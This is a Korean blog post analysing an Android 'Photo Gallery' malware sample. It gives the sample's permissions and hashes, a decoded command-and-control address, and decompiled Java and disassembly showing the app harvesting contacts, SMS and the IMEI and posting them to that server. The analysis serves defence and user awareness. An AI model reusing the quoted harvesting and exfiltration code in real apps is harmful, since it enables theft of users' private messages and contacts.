꿈을꾸는 파랑새

오늘은 안드로이드 악성코드인 포토갤러리(2020.10.1)에 글을 적어 보겠습니다. 일단 해당 안드로이드 악성코드의 권한은 다음과 같습니다.
안드로이드 권한
<uses-permission android:name="android.permission.READ_CONTACTS"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<uses-permission android:name="android.permission.READ_PHONE_NUMBERS"/>
<uses-permission android:name="android.permission.INTERNET"/>
여기서 보면 연락처 읽기,스마트폰 전화번호 읽기, 연락처 읽기 등이 있습니다.
그리고 악성코드의 해시 값은 다음과 같습니다.
MD5:0eb13fc7c5d3257a24a57ddc5e9c530b
SHA-1:17ab3126956b6e687c1f935fcd9b35a5bb7c0480
SHA-256:b47ff5c9418fab12e713bbc99eff16c7d5f577e67016c90bd4e5b1977b64d9a8

안드로이드 악성코드-포토갤러리(2020.10.1안드로이드 악성코드-포토갤러리(2020.10.1

그리고 com.tsfsatsag.myapplication.aa 내용은 다음과 같습니다.
public void onGranted() {
            aa.a = aa.aa("lNZKcVy5J3+QyXNTQKKog9kQ5gnhVaqdfwmPzcM+a5JaMakGmaWFXw==");
            if (System.currentTimeMillis() > 1602172800000L) {
              Toast.makeText((Context)aa.this, "end", 1).show();
              return;
여기서 암호화 를 풀면 61.43.242?67:10916/api/zhuan_bo 입니다.

com.tsfsatsag.myapplication.aacom.tsfsatsag.myapplication.aa

61.43.242.67 조회 결과
IP Address:61.43.242(.)67
[IP Blacklist Check]
Reverse DNS:** server can't find 67.242(.)43.61.in-addr.arpa: SERVFAIL
Hostname: 61.43.242(.)67
Location For an IP: 61.43(.)242.67
Continent:Asia (AS)
Country:Korea, Republic of   IP Location Find In Korea, Republic of (KR)
Capital:Seoul
State:Unknown
City Location:Unknown
ISP:LG DACOM Corporation
Organization:L? DACOM Corporation
AS Number:AS3786 L? DACOM Corporation
com.tsfsatsag.myapplication.aa

포토 갤러리 접속 사이트-통신전발관리시스템포토 갤러리 접속 사이트-통신전발관리시스템

문자&연락처 훔치는 코드
hashMap.put("uuid", aa.IMEI);
            hashMap.put("tel_str", aa.this.queryContactPhoneNumber());
            hashMap.put("sms_str", aa.this.getSmsFromPhone());
            try {
              hashMap.put("gps", "--##--");
              RequestParams requestParams = new RequestParams(aa.a);
              requestParams.setAsJsonContent(true);
              requestParams.setRequestBody(new aa.UrlEncodedParamsBody((Map)hashMap, "utf-8"));
이렇게 스마트폰의 개인정보를 훔치는 코드가 있는 것을 볼 수가 있습니다.
그리고 해당 사이트에 접속하면 다음과 같이 통신전발관리시스템 이라는 사이트로 접속되는 것을 볼 수가 있습니다.해당 웹소스를 보면 중국어로 되어져 있는것을 볼수가 있었습니다.

aa.getSmsFromPhone()aa.getSmsFromPhone()

그리고 IDA로 aa.getSmsFromPhone()을 보면 다음과 같이 보이는 것을 확인할 수가 있습니다.
CODE:0010BD44 # Source file: aa.java
CODE:0010BD44 public java.lang.String com.tsfsatsag.myapplication.aa.getSmsFromPhone()
CODE:0010BD44 this = v9                               # CODE XREF: aa$1_onGranted@V+1C8#j
CODE:0010BD44                 .line 214
CODE:0010BD44                 new-instance                    v0, <t: StringBuilder>
CODE:0010BD48                 invoke-direct                   {v0}, <void StringBuilder.<init>() imp. @ _def_StringBuilder__init_@V>
CODE:0010BD4E                 .line 215
CODE:0010BD4E                 invoke-virtual                  {this}, <ref aa.getContentResolver() imp. @ _def_aa_getContentResolver@L>
CODE:0010BD54                 move-result-object              v1
CODE:0010BD56                 const/4                         v2, 6
CODE:0010BD58                 new-array                       v3, v2, <t: String[]>
CODE:0010BD5C                 const/4                         v2, 0
CODE:0010BD5E                 const-string                    v4, a_id # "_id"
CODE:0010BD62                 aput-object                     v4, v3, v2
CODE:0010BD66                 const-string                    v7, aAddress # "address"
CODE:0010BD6A                 const/4                         v2, 1
CODE:0010BD6C                 aput-object                     v7, v3, v2
CODE:0010BD70                 const/4                         v2, 2
CODE:0010BD72                 const-string                    v4, aPerson # "person"
CODE:0010BD76                 aput-object                     v4, v3, v2
CODE:0010BD7A                 const-string                    v8, aBody # "body"
CODE:0010BD7E                 const/4                         v2, 3
CODE:0010BD80                 aput-object                     v8, v3, v2
CODE:0010BD84                 const/4                         v2, 4
CODE:0010BD86                 const-string                    v4, aDate # "date"
CODE:0010BD8A                 aput-object                     v4, v3, v2
CODE:0010BD8E                 const/4                         v2, 5
CODE:0010BD90                 const-string                    v4, aType_1 # "type"
CODE:0010BD94                 aput-object                     v4, v3, v2
CODE:0010BD98                 .line 217
CODE:0010BD98                 iget-object                     v2, this, aa_SMS_INBOX
CODE:0010BD9C                 const/4                         v4, 0
CODE:0010BD9E                 const/4                         v5, 0
CODE:0010BDA0                 const-string                    v6, aDateDesc # "date desc"
CODE:0010BDA4                 invoke-virtual/range            {v1..v6}, <ref ContentResolver.query(ref, ref, ref, ref, ref) imp. @ _def_ContentResolver_query@LLLLLL>
CODE:0010BDAA                 move-result-object              v1
CODE:0010BDAC                 if-nez                          v1, loc_10BDB6
CODE:0010BDB0                 const-string                    v0, unk_13C18F
CODE:0010BDB4
CODE:0010BDB4 locret:
CODE:0010BDB4                 return-object                   v0

aa.queryContactPhoneNumber()aa.queryContactPhoneNumber()

이런 식으로 되어져 있으면 aa.queryContactPhoneNumber()에서는 다음과 같습니다.
CODE:0010BE9C private java.lang.String com.tsfsatsag.myapplication.aa.queryContactPhoneNumber()
CODE:0010BE9C this = v10                              # CODE XREF: aa_access$200@LL#j
CODE:0010BE9C                 .line 185
CODE:0010BE9C                 new-instance                    v0, <t: StringBuilder>
CODE:0010BEA0                 invoke-direct                   {v0}, <void StringBuilder.<init>() imp. @ _def_StringBuilder__init_@V>
CODE:0010BEA6                 const/4                         v1, 2
CODE:0010BEA8                 new-array                       v4, v1, <t: String[]>
CODE:0010BEAC                 const-string                    v1, aDisplay_name # "display_name"
CODE:0010BEB0                 const/4                         v8, 0
CODE:0010BEB2                 aput-object                     v1, v4, v8
CODE:0010BEB6                 const-string                    v9, aData1 # "data1"
CODE:0010BEBA                 const/4                         v2, 1
CODE:0010BEBC                 aput-object                     v9, v4, v2
CODE:0010BEC0                 .line 187
CODE:0010BEC0                 invoke-virtual                  {this}, <ref aa.getContentResolver() imp. @ _def_aa_getContentResolver@L>
CODE:0010BEC6                 move-result-object              v2
CODE:0010BEC8                 sget-object                     v3, ContactsContract$CommonDataKinds$Phone_CONTENT_URI
CODE:0010BECC                 const/4                         v5, 0
CODE:0010BECE                 const/4                         v6, 0
CODE:0010BED0                 const/4                         v7, 0
CODE:0010BED2                 invoke-virtual/range            {v2..v7}, <ref ContentResolver.query(ref, ref, ref, ref, ref) imp. @ _def_ContentResolver_query@LLLLLL>
일단 이런 악성코드에 감염되지 않으면 안드로이드 정상 스토어 가 아닌 곳에서는 제발 앱을 설치를 하지 말고 그리고 백신앱 은 반드시 설치를 해서 실시간감시, 실시간 업데이트 는 필수이면 항상 강조하지만, 공식 스토어 에도 악성앱들이 배포가 되고 있으니까 항상 조심해야 합니다. 오늘은 간단하게 안드로이드 악성코드-포토 갤러리(2020.10.1)에 대해 글을 적어보았습니다.

그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band